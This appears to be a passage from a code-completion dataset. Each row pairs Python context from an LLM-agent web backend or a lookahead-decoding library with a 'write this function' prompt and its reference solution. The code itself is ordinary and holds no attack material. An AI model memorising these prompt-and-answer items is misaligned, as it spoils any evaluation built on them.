selected_plugins: List[str],
api_key_info: List[Dict],
llm: BaseLanguageModel,
llm_name: str,
) -> AgentExecutor:
"""Creates an agent executor for interaction.
Args:
selected_plugins: A list of selected plugins.
api_key_info: A list of plugin api keys.
llm: A llm model.
llm_name: A string llm name.
Returns:
An agent executor.
"""
# Initialize memory
memory = ConversationReActBufferMemory(memory_key="chat_history",
return_messages=True, style="plugin",
max_token_limit=10000)
class RunPlugin:
def __init__(self, plugin: PluginExecutor, llm: BaseLanguageModel):
self.plugin = plugin
self.llm = llm
def run(self, term: str) -> Union[str, Dict, DataModel]:
try:
raw_observation = self.plugin.run(user_intent=term, llm=self.llm)
input_json, output = raw_observation["input_json"], raw_observation[
"api_output"]
observation = JsonDataModel.from_raw_data(
{
"success": True,
"result": json.dumps(output, indent=4) if isinstance(output,
dict) else output,
"intermediate_steps": json.dumps(input_json, indent=4),
}
)
return observation
except Exception as e:
observation = JsonDataModel.from_raw_data(
{
"success": False,
"result": str(e),
}
)
print(traceback.format_exc())
return observation
# Load plugins from selected names
_plugins = []
for selected_plugin in selected_plugins:
plugin = PluginExecutor.from_plugin_name(selected_plugin)
llm = copy.deepcopy(llm)
if len([i for i in api_key_info if i["tool_name"] == plugin.name]) != 0:
plugin.api_key = \
[i for i in api_key_info if i["tool_name"] == plugin.name][0]["api_key"]
# For some plugins, we need to reload the plugin to update personal data
plugin.load_personnel_info() # warning: this will change the plugin object every time we make a new query
run_plugin = RunPlugin(plugin, llm)
_plugins.append(Tool(name=plugin.name, func=run_plugin.run,
description=plugin.full_description))
continue_model = llm_name if llm_name in NEED_CONTINUE_MODEL else None
interaction_executor = initialize_plugin_agent(
_plugins, llm, continue_model, memory=memory, verbose=True
)
return interaction_executor
def get_llm(llm_name: str, **kwargs) -> BaseLanguageModel:
"""Gets the llm model by its name."""
if llm_name in ["gpt-3.5-turbo-16k", "gpt-4"]:
openai_api_type = os.getenv("OPENAI_API_TYPE", "open_ai")
if openai_api_type == "open_ai":
chat_openai = ChatOpenAI
kwargs.update({"model_name": llm_name})
elif openai_api_type == "azure":
chat_openai = AzureChatOpenAI
kwargs.update({"deployment_name": llm_name})
return chat_openai(
streaming=True,
verbose=True,
**kwargs
)
elif llm_name in ["claude-v1", "claude-2"]:
anthropic_api_key = os.getenv("ANTHROPIC_API_KEY", "")
return ChatAnthropic(
model=llm_name,
streaming=True,
verbose=True,
anthropic_api_key=anthropic_api_key,
**kwargs,
)
elif llm_name == "lemur-chat":
return ChatOpenAI(
model_name="lemur-70b-chat-v1",
streaming=True,
openai_api_base="https://model-api.xlang.ai/v1",
verbose=True,
max_tokens=2048,
**kwargs
)
else:
raise ValueError(f"llm_name {llm_name} not found")
logger = init_log(
error=os.path.join(".logging", "error.log"),
runtime=os.path.join(".logging", "runtime.log"),
serialize=os.path.join(".logging", "serialize.log"),
trace=os.path.join(".logging", "trace.log"),
)
message_pool: MessageMemoryManager = MessageMemoryManager(name="message_pool", backend=MESSAGE_MEMORY_MANAGER_BACKEND)
api_key_pool: UserMemoryManager = UserMemoryManager(name="api_key_pool", backend=API_KEY_MEMORY_MANAGER_BACKEND)
message_id_register = VariableRegister(name="message_id_register", backend=VARIABLE_REGISTER_BACKEND)
def single_round_chat_with_agent_streaming(
stream_handler: AgentStreamingStdOutCallbackHandler,
interaction_executor: AgentExecutor,
user_intent: str,
human_message_id: int,
ai_message_id: int,
user_id: str,
chat_id: str,
message_list: List[Dict[str, Any]],
parent_message_id: int,
llm_name: str,
app_type: str = "plugins",
) -> Any:
"""Streams the response of the agent to the frontend."""
assert app_type in APP_TYPES, f"app_type should be one of {APP_TYPES}"
with multiprocess.Manager() as share_manager:
err_pool: Dict[str, Any] = share_manager.dict()
memory_pool: Dict[str, Any] = share_manager.dict()
share_list = share_manager.list()
memory_pool[chat_id] = []
stream_handler.for_display = share_list
chat_thread = multiprocess.Process(
target=_wrap_agent_caller,
args=(
interaction_executor,
{
"input": user_intent,
},
chat_id,
err_pool,
memory_pool,
[stream_handler],
),
)
threading_pool.register_thread(chat_id, chat_thread)
chat_thread.start()
empty_s_time: float = -1
last_heartbeat_time: float = -1
timeout = TIME_OUT_MAP[app_type]
LEFT_SIGN = "("
RIGHT_SIGN = ")"
start_buffer = False
streamed_transition_text_buffer = ""
streamed_links = []
converted_card_info_list = []
yield pack_json(
{
"human_message_id": human_message_id,
"ai_message_id": ai_message_id,
}
)
# Display streaming to frontend
display_stream = DisplayStream(execution_result_max_tokens=EXECUTION_RESULT_MAX_TOKENS_MAP[app_type])
is_block_first, current_block_type = False, None
intermediate_list, final_list = [], [] # Only for database storage
try:
while chat_thread.is_alive() or len(stream_handler.for_display) > 0:
# print(memory_pool, err_pool, "out")
if stream_handler.is_end:
# The ending of the streaming is marked by the is_end variable from AgentStreamingStdOutCallbackHandler in agent_streaming.py
break
if len(stream_handler.for_display) == 0:
# first time display list is empty
if empty_s_time == -1:
empty_s_time = time.time()
# already empty for some time
else:
if time.time() - empty_s_time > timeout and chat_thread.is_alive():
threading_pool.timeout_thread(chat_id)
break
if last_heartbeat_time == -1:
last_heartbeat_time = time.time()
else:
if time.time() - last_heartbeat_time > HEARTBEAT_INTERVAL and chat_thread.is_alive():
last_heartbeat_time = -1
yield _streaming_token(
{"text": "🫀", "type": "heartbeat", "final": False}, False, user_id, chat_id, False
)
else:
empty_s_time = -1
last_heartbeat_time = -1
while len(stream_handler.for_display) > 0:
token = stream_handler.for_display.pop(0)
items_to_display = display_stream.display(token)
# Skip the "identifier" and "key" token
if items_to_display is None:
continue
for item in items_to_display:
# Check if the block type is changed
if item["type"] != current_block_type:
current_block_type = item["type"]
is_block_first = True
else:
is_block_first = False
is_final = item.get("final", False)
# Render the item(s)
if item["type"] in STREAM_BLOCK_TYPES:
# Render image and echarts as block
yield _streaming_block(item, is_final, user_id, chat_id)
elif item["type"] in STREAM_TOKEN_TYPES:
# Render the rest as plain text
item["text"] = _render_preprocess(item["text"])
yield _streaming_token(item, is_final, user_id, chat_id, is_block_first)
# Save the intermediate steps and final answer
if is_final:
final_list.append(item)
else:
intermediate_list.append(item)
if item["type"] == "transition" and item["text"] == RIGHT_SIGN:
start_buffer = False
link = streamed_transition_text_buffer
streamed_transition_text_buffer = ""
card_info_list = extract_card_info_from_text(link)
# empty the buffer after extracting card info
streamed_transition_text_buffer = ""
if len(card_info_list) > 0:
streaming_card_info_list: list[dict[str, Any]] = [
{
"final_answer": {
"text": json.dumps(card_info),
"type": "card_info",
},
"is_block_first": False,
"streaming_method": "card_info",
"user_id": user_id,
"chat_id": chat_id,
}
for card_info in card_info_list
]
streamed_links.extend([card_info["web_link"] for card_info in card_info_list])
converted_card_info_list.extend(
[
{
"text": stream_card_info["final_answer"]["text"],
"type": stream_card_info["final_answer"]["type"],
}
for stream_card_info in streaming_card_info_list
]
)
for streaming_card_info in streaming_card_info_list:
yield pack_json(streaming_card_info)
if start_buffer == True:
streamed_transition_text_buffer += item["text"]
if item["type"] == "transition" and item["text"] == LEFT_SIGN:
start_buffer = True
except Exception as e:
import traceback
traceback.print_exc()
# Wait for the chat thread to finish
chat_thread.join()
stop_flag, timeout_flag, error_msg = threading_pool.flush_thread(chat_id)
error_msg = err_pool.pop(chat_id, None)
# Response Error!!
if stop_flag:
yield pack_json({"success": False, "error": "stop"})
return
elif timeout_flag:
yield pack_json({"success": False, "error": "timeout"})
return
elif error_msg is not None:
error_msg_to_render = error_rendering(error_msg)
yield pack_json({"success": False, "error": "internal", "error_msg": error_msg_to_render})
return
elif len(memory_pool[chat_id]) == 0:
yield pack_json({"success": False, "error": "internal"})
return
# Response Success!!
message_list_from_memory = memory_pool[chat_id]
del stream_handler
# share_manager.shutdown()
del memory_pool, err_pool, share_list, share_manager, interaction_executor
# Save conversation to memory
new_human_message = message_list_from_memory[-2]
new_ai_message = message_list_from_memory[-1]
new_human_message.update({"message_id": human_message_id, "parent_message_id": parent_message_id})
new_ai_message.update({"message_id": ai_message_id, "parent_message_id": human_message_id})
message_list.extend([new_human_message, new_ai_message])
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat", msg_head="New human message").debug(new_human_message)
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat", msg_head="New ai message").debug(new_ai_message)
MessageMemoryManager.set_pool_info_with_id(message_pool, user_id, chat_id, message_list)
# Save conversation to database
db = get_user_conversation_storage()
# Combine the streaming tokens/blocks
intermediate_list_combined = _combine_streaming(intermediate_list)
final_list_combined = _combine_streaming(final_list)
if len(converted_card_info_list) > 0:
final_list_combined.extend(converted_card_info_list)
# Insert User Message, if regenerate there is no need to insert again
db.message.insert_one(
{
"conversation_id": chat_id,
"user_id": user_id,
"message_id": human_message_id,
"parent_message_id": parent_message_id,
"version_id": 0,
"role": "user",
"data_for_human": user_intent,
"data_for_llm": message_list[-2]["message_content"],
"raw_data": None,
}
)
# Insert AI Message
db.message.insert_one(
{
"conversation_id": chat_id,
"user_id": user_id,
"message_id": ai_message_id,
"parent_message_id": human_message_id,
"version_id": 0,
"role": "assistant",
"data_for_human": {
"intermediate_steps": intermediate_list_combined,
"final_answer": final_list_combined,
},
"data_for_llm": message_list[-1]["message_content"],
"raw_data": None,
}
)
OVERLOAD = 503
DEFAULT_USER_ID = "DefaultUser"
class AgentStreamingStdOutCallbackHandler(StreamingStdOutCallbackHandler):
is_end = False
generated_tokens: list = []
for_display: list = []
# Automata
pda = JSON_PDA()
llm_call_id = 0
_in_json = False
_in_key = False
_in_value = False
_direct_display = True
_normal_json = False
json_key: str = ""
json_tmp_stack: list = []
action_key_appear = False
def always_verbose(self) -> bool:
"""Whether to call verbose callbacks even if verbose is False."""
return True
def on_llm_start(self, serialized: Dict[str, Any], prompts: List[str], **kwargs: Any) -> None:
self.is_end = False
self.generated_tokens = []
self.pda = JSON_PDA()
self.llm_call_id += 1
self._in_json = False
self._in_key = False
self._in_value = False
self._direct_display = True
self._normal_json = False
self.json_key = ""
self.json_tmp_stack = []
def on_llm_new_token(self, token: str, **kwargs: Any) -> None:
"""
Run on new LLM token. Only available when streaming is enabled.
The tokens that we can decide their types ('plain', 'identifier', 'key', 'action', 'action_input') are stored in `self.for_display`.
"""
self.generated_tokens.append(token)
# Automata that monitor json block
for char in token:
self.pda.transition(char)
# Handle the logic of sentences and json blocks
_type = "plain"
if self.pda.state in ["open_brace", "open_one_backtick"]:
self._in_json = True
self._direct_display = False
self._normal_json = False
self.action_key_appear = False
if self._in_json and not self._normal_json:
_type = "identifier"
if self.pda.state == "in_block":
_type = "plain"
self._normal_json = True
if self.pda.state == "open_key_quote":
if self._in_key:
self.json_key += char
_type = "key"
self._in_key = True
else:
self._in_key = False
if self.pda.state == "open_value_quote" or self.pda.state == "open_value_quote_brace":
if self._in_value:
_type = self.json_key
self._in_value = True
else:
if self._in_value:
self.json_key = ""
self._in_value = False
if self.pda.state == "close_key_quote":
# Normal json block
if self.json_key not in ["action", "action_input"]:
for char_item in self.json_tmp_stack:
self.for_display.append(
{"text": char_item["text"], "type": "plain", "llm_call_id": self.llm_call_id}
)
self.json_tmp_stack = []
self.for_display.append({"text": char, "type": "plain", "llm_call_id": self.llm_call_id})
self._normal_json = True
continue
else:
if self.json_key == "action":
self.action_key_appear = True
elif self.json_key == "action_input" and self.action_key_appear:
# Action json block
for char_item in self.json_tmp_stack:
char_item["llm_call_id"] = self.llm_call_id
self.for_display.append(char_item)
self.json_tmp_stack = []
self._direct_display = True
else:
for char_item in self.json_tmp_stack:
self.for_display.append(
{"text": char_item["text"], "type": "plain", "llm_call_id": self.llm_call_id}
)
self.json_tmp_stack = []
self._direct_display = True
if self.pda.state == "start":
self._in_json = False
self.for_display.append(
{"text": char, "type": _type, "llm_call_id": self.llm_call_id}
) if self._direct_display else self.json_tmp_stack.append(
{"text": char, "type": _type, "llm_call_id": self.llm_call_id}
)
def on_llm_end(self, response, **kwargs: Any) -> None:
"""Run when LLM ends running."""
self.is_end = True
for char_item in self.json_tmp_stack:
self.for_display.append({"text": char_item["text"], "type": "plain", "llm_call_id": self.llm_call_id})
def on_tool_end(self, output: Union[DataModel, str], **kwargs: Any) -> None:
"""Run on tool end to add observation data model."""
self.for_display.append({"text": output, "type": "block", "llm_call_id": self.llm_call_id})
The provided code snippet includes necessary dependencies for implementing the `chat_xlang_plugin` function. Write a Python function `def chat_xlang_plugin() -> Dict` to solve the following problem:
Returns the chat response of plugins agent.
Here is the function:
def chat_xlang_plugin() -> Dict:
"""Returns the chat response of plugins agent."""
try:
# Get request parameters
request_json = request.get_json()
user_id = request_json.pop("user_id", DEFAULT_USER_ID)
chat_id = request_json["chat_id"]
user_intent = request_json["user_intent"]
parent_message_id = request_json["parent_message_id"]
selected_plugins = request_json["selected_plugins"]
llm_name = request_json["llm_name"]
temperature = request_json.get("temperature", 0.4)
stop_words = ["[RESPONSE_BEGIN]", "TOOL RESPONSE"]
kwargs = {
"temperature": temperature,
"stop": stop_words,
}
# pass user id and chat id to tool selector
if tool_selector:
tool_selector.user_id = user_id
tool_selector.chat_id = chat_id
# Get language model
llm = get_llm(llm_name, **kwargs)
logger.bind(user_id=user_id, chat_id=chat_id, api="/chat",
msg_head="Request json").debug(request_json)
# Get API key for plugins
api_key_info = api_key_pool.get_pool_info_with_id(user_id,
default_value=[]) # fixme: mock user_id: 1
activated_message_list = message_pool.get_activated_message_list(user_id,
chat_id,
list(),
parent_message_id)
# Flag for auto retrieving plugins
if len(selected_plugins) == 1 and selected_plugins[0].lower() == "auto":
if tool_selector:
# this will return a list of plugin names sorted by relevance (lower case and the same as their dir name)
query = tool_selector.load_query_from_message_list(activated_message_list,
user_intent)
selected_plugins = tool_selector.select_tools(query=query, top_k=5)
else:
selected_plugins = [_plugin['id'] for _plugin in random.sample(plugins, 5)]
# Build executor and run chat
stream_handler = AgentStreamingStdOutCallbackHandler()
interaction_executor = create_plugins_interaction_executor(
selected_plugins=selected_plugins,
api_key_info=api_key_info,
llm=llm,
llm_name=llm_name,
)
message_pool.load_agent_memory_from_list(interaction_executor.memory,
activated_message_list)
human_message_id = message_id_register.add_variable(user_intent)
ai_message_id = message_id_register.add_variable("")
return stream_with_context(
Response(
single_round_chat_with_agent_streaming(
interaction_executor=interaction_executor,
user_intent=user_intent,
human_message_id=human_message_id,
ai_message_id=ai_message_id,
user_id=user_id,
chat_id=chat_id,
message_list=activated_message_list,
parent_message_id=parent_message_id,
stream_handler=stream_handler,
llm_name=llm_name,
app_type="plugins",
),
content_type="application/json",
)
)
except Exception as e:
import traceback
traceback.print_exc()
return Response(response=None,
status=f"{OVERLOAD} backend is currently overloaded") | Returns the chat response of plugins agent. |
188,456 | from typing import Dict, Optional, List
import json
import base64
import re
import ast
import mo_sql_parsing
from pydantic import BaseModel
from real_agents.adapters.data_model import MessageDataModel, DataModel
def split_text_and_code(text: str) -> List:
pattern = r"(```[\s\S]+?```)"
result = [x for x in re.split(pattern, text) if x.strip()]
return result | null |
188,457 | from typing import Dict, Optional, List
import json
import base64
import re
import ast
import mo_sql_parsing
from pydantic import BaseModel
from real_agents.adapters.data_model import MessageDataModel, DataModel
def is_json(text: str) -> bool:
try:
json.loads(text)
return True
except json.JSONDecodeError:
return False
def detect_code_type(code) -> str:
# Attempt Python parsing
try:
ast.parse(code)
return "python"
except SyntaxError:
pass
# Attempt SQL parsing
try:
mo_sql_parsing.parse(code)
return "sql"
except:
pass
# If all else fails, it's probably plain text
return "text"
The provided code snippet includes necessary dependencies for implementing the `add_backticks` function. Write a Python function `def add_backticks(text: str) -> str` to solve the following problem:
Add backticks to code blocks.
Here is the function:
def add_backticks(text: str) -> str:
"""Add backticks to code blocks."""
text_type = detect_code_type(text)
if is_json(text):
text = "```json\n" + text + "\n```"
elif text_type == "python":
if not text.startswith("```") and not text.endswith("```"):
text = "```python\n" + text + "\n```"
elif text_type == "sql":
if not text.startswith("```") and not text.endswith("```"):
text = "```sql\n" + text + "\n```"
return text | Add backticks to code blocks. |
188,458 | import redis
from typing import Any
from backend.utils.utils import logger
import os
r = redis.Redis(host=os.getenv("REDIS_SERVER"), port=6379, decode_responses=True)
QUEUE_RUNNING = "kernel_running_queue"
QUEUE_PENDING = "kernel_pending_queue"
SUBMIT_EVENT = "job_submitted"
COMPLETE_EVENT = "job_completed"
def handle_job_completion(message: dict) -> None:
def handle_new_job(message: dict) -> None:
def start_kernel_publisher() -> None:
# Connect to Redis
r.delete(QUEUE_RUNNING)
r.delete(QUEUE_PENDING)
# Start the publisher & subscriber
p = r.pubsub()
p.subscribe(**{COMPLETE_EVENT: handle_job_completion, SUBMIT_EVENT: handle_new_job})
p.run_in_thread(sleep_time=0.1) | null |
188,459 | import json
import re
import struct
import time
from typing import Any, Dict, List, Optional, Literal
import multiprocess
import requests
from bs4 import BeautifulSoup
from backend.display_streaming import DisplayStream
from backend.main import logger, message_pool, threading_pool
from backend.utils.user_conversation_storage import get_user_conversation_storage
from backend.utils.utils import error_rendering
from backend.memory import MessageMemoryManager
from backend.schemas import (
APP_TYPES,
TIME_OUT_MAP,
HEARTBEAT_INTERVAL,
STREAM_BLOCK_TYPES,
STREAM_TOKEN_TYPES,
EXECUTION_RESULT_MAX_TOKENS_MAP,
)
from real_agents.data_agent import DataSummaryExecutor
from real_agents.adapters.callbacks.agent_streaming import AgentStreamingStdOutCallbackHandler
from real_agents.adapters.agent_helpers import Agent, AgentExecutor
from real_agents.adapters.llm import BaseLanguageModel
def check_url_exist(text: str) -> bool:
"""check in a text whether there is a url"""
# this regex extracts the http(s) with whitespace or () in the beginning and end, since usually the url is surrounded by whitespace or ()
# e.g. " https://google.com " or "(https://google.com)"
url_regex = r"(http[s]?://(?:[a-zA-Z]|[0-9]|[$-_@.&+]|[!*\\(\\),]|(?:%[0-9a-fA-F][0-9a-fA-F]))+)"
links = re.findall(url_regex, text)
return len(links) > 0
def extract_title_and_image_links(url: str) -> (tuple[Literal[''], list] | tuple[Any, list]):
try:
res = requests.get(url, timeout=3)
if res.status_code != 200:
return "", []
soup = BeautifulSoup(res.text, "html.parser")
title_tag = soup.find_all("title")[0].text
img_tags = soup.find_all("img")
# List to store image links with large width and height
large_img_links = []
# List to store all image links
all_img_links = []
for img in img_tags:
if "src" in img.attrs:
all_img_links.append(img["src"])
# Check if width and height attributes exist and add to the large list
if "width" in img.attrs and "height" in img.attrs:
# Ensure the width and height attributes can be converted to integers
if int(img["width"]) > 100 and int(img["height"]) > 100:
large_img_links.append(img["src"])
else:
continue
# If large images were found, return those, otherwise return all images
img_links = large_img_links if large_img_links else []
# fixme: handle the case there are no such tags
return title_tag, img_links
except requests.exceptions.Timeout:
print("Request timed out!")
return "", []
except Exception as e:
print(f"Error processing {url}: {e}")
return "", []
def extract_card_info_from_links(links: List[str]) -> list[dict[str, Any]]:
rt = []
for link in links:
if check_url_exist(link):
title, image_links = extract_title_and_image_links(link)
if len(image_links) > 0:
selected_image_link = image_links[0]
else:
selected_image_link = "" # no image in this website
rt.append({"title": title, "web_link": link, "image_link": selected_image_link})
else:
continue
return rt | null |
188,460 | import os
import sys
import base64
from pathlib import Path
from typing import Any, Dict, Tuple, Union
import pandas as pd
import tiktoken
from flask import Request
from sqlalchemy import create_engine
from PIL import Image
from loguru import logger
from real_agents.adapters.data_model import (
DatabaseDataModel,
DataModel,
ImageDataModel,
TableDataModel,
KaggleDataModel,
)
from real_agents.data_agent import (
DataSummaryExecutor,
TableSummaryExecutor,
ImageSummaryExecutor,
)
from real_agents.adapters.schema import SQLDatabase
from backend.utils.running_time_storage import get_running_time_storage
from backend.app import app
from backend.schemas import DEFAULT_USER_ID
DOCUMENT_EXTENSIONS = {"pdf", "doc", "docx", "txt"}
def is_document_file(filename: Union[str, Path]) -> bool:
if isinstance(filename, str):
filename = Path(filename)
suffix = filename.suffix[1:]
if suffix in DOCUMENT_EXTENSIONS:
return True
else:
return False | null |
188,461 | import os
import sys
import base64
from pathlib import Path
from typing import Any, Dict, Tuple, Union
import pandas as pd
import tiktoken
from flask import Request
from sqlalchemy import create_engine
from PIL import Image
from loguru import logger
from real_agents.adapters.data_model import (
DatabaseDataModel,
DataModel,
ImageDataModel,
TableDataModel,
KaggleDataModel,
)
from real_agents.data_agent import (
DataSummaryExecutor,
TableSummaryExecutor,
ImageSummaryExecutor,
)
from real_agents.adapters.schema import SQLDatabase
from backend.utils.running_time_storage import get_running_time_storage
from backend.app import app
from backend.schemas import DEFAULT_USER_ID
The provided code snippet includes necessary dependencies for implementing the `remove_nan` function. Write a Python function `def remove_nan(file_path: str) -> None` to solve the following problem:
We only support csv file in the current version By default, we remove columns that contain only nan values For columns that have both nan values and non-nan values, we replace nan values with the mean (number type) or the mode (other type)
Here is the function:
def remove_nan(file_path: str) -> None:
"""
We only support csv file in the current version
By default, we remove columns that contain only nan values
For columns that have both nan values and non-nan values, we replace nan values with the mean (number type)
or the mode (other type)
"""
if file_path.endswith("csv"):
df = pd.read_csv(file_path)
columns = list(df.columns)
nan_columns = []
for c in columns:
if all(list(df[c].isnull())):
nan_columns.append(c)
df.drop(columns=nan_columns, inplace=True)
columns = list(df.columns)
for c in columns:
try:
fillin_value = df[c].mean()
except Exception:
fillin_value = df[c].mode()
df[c].fillna(value=fillin_value, inplace=True)
df.to_csv(file_path) | We only support csv file in the current version By default, we remove columns that contain only nan values For columns that have both nan values and non-nan values, we replace nan values with the mean (number type) or the mode (other type) |
188,462 | import os
import sys
import base64
from pathlib import Path
from typing import Any, Dict, Tuple, Union
import pandas as pd
import tiktoken
from flask import Request
from sqlalchemy import create_engine
from PIL import Image
from loguru import logger
from real_agents.adapters.data_model import (
DatabaseDataModel,
DataModel,
ImageDataModel,
TableDataModel,
KaggleDataModel,
)
from real_agents.data_agent import (
DataSummaryExecutor,
TableSummaryExecutor,
ImageSummaryExecutor,
)
from real_agents.adapters.schema import SQLDatabase
from backend.utils.running_time_storage import get_running_time_storage
from backend.app import app
from backend.schemas import DEFAULT_USER_ID
def is_valid_input(user_intent: str, max_token_limit: int = 2000) -> bool:
enc = tiktoken.get_encoding("cl100k_base")
tokens = len(enc.encode(user_intent))
return tokens <= max_token_limit | null |
188,463 | import os
import sys
import base64
from pathlib import Path
from typing import Any, Dict, Tuple, Union
import pandas as pd
import tiktoken
from flask import Request
from sqlalchemy import create_engine
from PIL import Image
from loguru import logger
from real_agents.adapters.data_model import (
DatabaseDataModel,
DataModel,
ImageDataModel,
TableDataModel,
KaggleDataModel,
)
from real_agents.data_agent import (
DataSummaryExecutor,
TableSummaryExecutor,
ImageSummaryExecutor,
)
from real_agents.adapters.schema import SQLDatabase
from backend.utils.running_time_storage import get_running_time_storage
from backend.app import app
from backend.schemas import DEFAULT_USER_ID
The provided code snippet includes necessary dependencies for implementing the `init_log` function. Write a Python function `def init_log(**sink_channel)` to solve the following problem:
Initialize loguru log information
Here is the function:
def init_log(**sink_channel):
"""Initialize loguru log information"""
# Just for sys.stdout log message
format_stdout = (
"<g>{time:YYYY-MM-DD HH:mm:ss}</g> | <lvl>{level}</lvl> - {extra[user_id]}++{extra[chat_id]}-><y>{extra[api]}</y> "
"<LC>{extra[msg_head]}</LC>:{message}"
)
# Avoid unexpected KeyError
# Do not unpack key-value pairs, but save all records.
format_full_extra = (
"<g>{time:YYYY-MM-DD HH:mm:ss}</g> | <lvl>{level}</lvl> - <c><u>{name}</u></c> | {message} - {extra}"
)
logger.remove()
logger.configure(
handlers=[
dict(sink=sys.stdout, format=format_stdout, level="TRACE"),
dict(
sink=sink_channel.get("error"),
format=format_full_extra,
level="ERROR",
diagnose=False,
rotation="1 week",
),
dict(
sink=sink_channel.get("runtime"),
format=format_full_extra,
level="DEBUG",
diagnose=False,
rotation="20 MB",
retention="20 days",
),
dict(
sink=sink_channel.get("serialize"),
level="DEBUG",
diagnose=False,
serialize=True,
),
],
extra={"user_id": "", "chat_id": "", "api": "", "msg_head": ""},
)
return logger | Initialize loguru log information |
188,464 | import redis
from flask import g
import os
The provided code snippet includes necessary dependencies for implementing the `get_running_time_storage` function. Write a Python function `def get_running_time_storage()` to solve the following problem:
Connects to redis.
Here is the function:
def get_running_time_storage():
"""Connects to redis."""
if "running_time_storage" not in g:
g.running_time_storage = redis.Redis(host=os.getenv("REDIS_SERVER"), port=6379, decode_responses=True)
# Set maxmemory to 200MB (value is in bytes)
g.running_time_storage.config_set("maxmemory", "500000000")
# Set maxmemory policy to allkeys-lru (Least Recently Used)
g.running_time_storage.config_set("maxmemory-policy", "allkeys-lru")
return g.running_time_storage | Connects to redis. |
188,465 | import pymongo
from flask import g
import os
The provided code snippet includes necessary dependencies for implementing the `close_user_conversation_storage` function. Write a Python function `def close_user_conversation_storage()` to solve the following problem:
Closes mongodb.
Here is the function:
def close_user_conversation_storage():
"""Closes mongodb."""
user_conversation_storage = g.pop("user_conversation_storage", None)
if user_conversation_storage is not None:
user_conversation_storage["xlang"].close() | Closes mongodb. |
188,466 | import os
from transformers import GenerationMixin
from transformers.models.llama import modeling_llama
from lade.decoding import greedy_search_proxy, sample_proxy, FUNC_MAP, CONFIG_MAP
from lade.models import modeling_llama as lade_modeling_llama
from transformers import AutoConfig, AutoTokenizer, AutoModelForCausalLM
import torch
import torch.distributed as dist
import inspect
CONFIG_MAP = {}
def config_lade(WINDOW_SIZE=None, LEVEL=None, DEBUG=None, GUESS_SET_SIZE=None, ALWAYS_FWD_ONE=None, SPLIT_FLAG=None, DIST_WORKERS=None, POOL_FROM_PROMPT=None, backend = 'nccl', USE_FLASH=None):
if WINDOW_SIZE is not None:
CONFIG_MAP["WINDOW_SIZE"] = WINDOW_SIZE
if LEVEL is not None:
CONFIG_MAP["LEVEL"] = LEVEL
if GUESS_SET_SIZE is not None:
CONFIG_MAP["GUESS_SET_SIZE"] = GUESS_SET_SIZE
if ALWAYS_FWD_ONE is not None:
CONFIG_MAP["ALWAYS_FWD_ONE"] = ALWAYS_FWD_ONE
if DEBUG is not None:
CONFIG_MAP["DEBUG"] = DEBUG
if SPLIT_FLAG is not None:
CONFIG_MAP["SPLIT_FLAG"] = SPLIT_FLAG
if POOL_FROM_PROMPT is not None:
CONFIG_MAP["POOL_FROM_PROMPT"] = POOL_FROM_PROMPT
if DIST_WORKERS is not None and DIST_WORKERS > 1:
CONFIG_MAP["DIST_WORKERS"] = DIST_WORKERS
CONFIG_MAP["LOCAL_RANK"] = int(os.environ["LOCAL_RANK"])
dist.init_process_group(backend, rank=CONFIG_MAP["LOCAL_RANK"])
torch.cuda.set_device(CONFIG_MAP["LOCAL_RANK"])
assert dist.get_world_size() == DIST_WORKERS, "DIST_WORKERS config should be equal to work size"
if USE_FLASH is not None:
CONFIG_MAP["USE_FLASH"] = USE_FLASH
CONFIG_MAP["log"] = [] | null |
188,467 | import os
from transformers import GenerationMixin
from transformers.models.llama import modeling_llama
from lade.decoding import greedy_search_proxy, sample_proxy, FUNC_MAP, CONFIG_MAP
from lade.models import modeling_llama as lade_modeling_llama
from transformers import AutoConfig, AutoTokenizer, AutoModelForCausalLM
import torch
import torch.distributed as dist
import inspect
def augment_llama():
inject_module(lade_modeling_llama, modeling_llama)
#llama.modeling_llama.LlamaForCausalLM = lade_modeling_llama.LlamaForCausalLM
#modeling_llama.LlamaForCausalLM.jforward_multilevel = lookahead_llama.jforward_multilevel
#modeling_llama.LlamaModel.LlamaModeljforward = lookahead_llama.LlamaModeljforward
#modeling_llama.LlamaModel.j_prepare_decoder_attention_mask = lookahead_llama.j_prepare_decoder_attention_mask
def augment_generate():
FUNC_MAP["greedy_search"] = GenerationMixin.greedy_search
FUNC_MAP["sample"] = GenerationMixin.sample
GenerationMixin.greedy_search = greedy_search_proxy
GenerationMixin.sample = sample_proxy
#FUNC_MAP["sample"] = GenerationMixin.sample
#GenerationMixin.sample = sample_proxy
def augment_all():
augment_llama()
augment_generate() | null |
188,468 | import os
from transformers import GenerationMixin
from transformers.models.llama import modeling_llama
from lade.decoding import greedy_search_proxy, sample_proxy, FUNC_MAP, CONFIG_MAP
from lade.models import modeling_llama as lade_modeling_llama
from transformers import AutoConfig, AutoTokenizer, AutoModelForCausalLM
import torch
import torch.distributed as dist
import inspect
CONFIG_MAP = {}
def log_history(clear=False):
gen = 0
step = 0
if "log" in CONFIG_MAP:
for log in CONFIG_MAP["log"]:
gen += log[0]
step += log[1]
if clear:
CONFIG_MAP["log"] = []
print("LADE LOG - OVERALL GEN: ", gen, " STEPS: ", step, " AVG COMPRESS RATIO: ", (gen / step) if step > 0 else 0) | null |
188,469 | import os
from transformers import GenerationMixin
from transformers.models.llama import modeling_llama
from lade.decoding import greedy_search_proxy, sample_proxy, FUNC_MAP, CONFIG_MAP
from lade.models import modeling_llama as lade_modeling_llama
from transformers import AutoConfig, AutoTokenizer, AutoModelForCausalLM
import torch
import torch.distributed as dist
import inspect
CONFIG_MAP = {}
def save_log(log_dir):
if "log" in CONFIG_MAP:
torch.save(CONFIG_MAP["log"], log_dir) | null |
188,470 | import os
from transformers import GenerationMixin
from transformers.models.llama import modeling_llama
from lade.decoding import greedy_search_proxy, sample_proxy, FUNC_MAP, CONFIG_MAP
from lade.models import modeling_llama as lade_modeling_llama
from transformers import AutoConfig, AutoTokenizer, AutoModelForCausalLM
import torch
import torch.distributed as dist
import inspect
def get_hf_model(model_path, quant, dtype, device, cache_dir):
tokenizer = AutoTokenizer.from_pretrained(model_path, fast_tokenizer=True)
model_config = AutoConfig.from_pretrained(model_path)
assert quant is None or len(quant) == 0
model = AutoModelForCausalLM.from_pretrained(
model_path, torch_dtype=dtype, device_map=device, cache_dir=cache_dir if len(cache_dir) > 0 else None)
model = model.eval()
model.tokenizer = tokenizer
return model, tokenizer
def get_model(model_path, quant, dtype, device, cache_dir, use_ds, native_offload = False):
return get_hf_model(model_path, quant, dtype, device, cache_dir) | null |
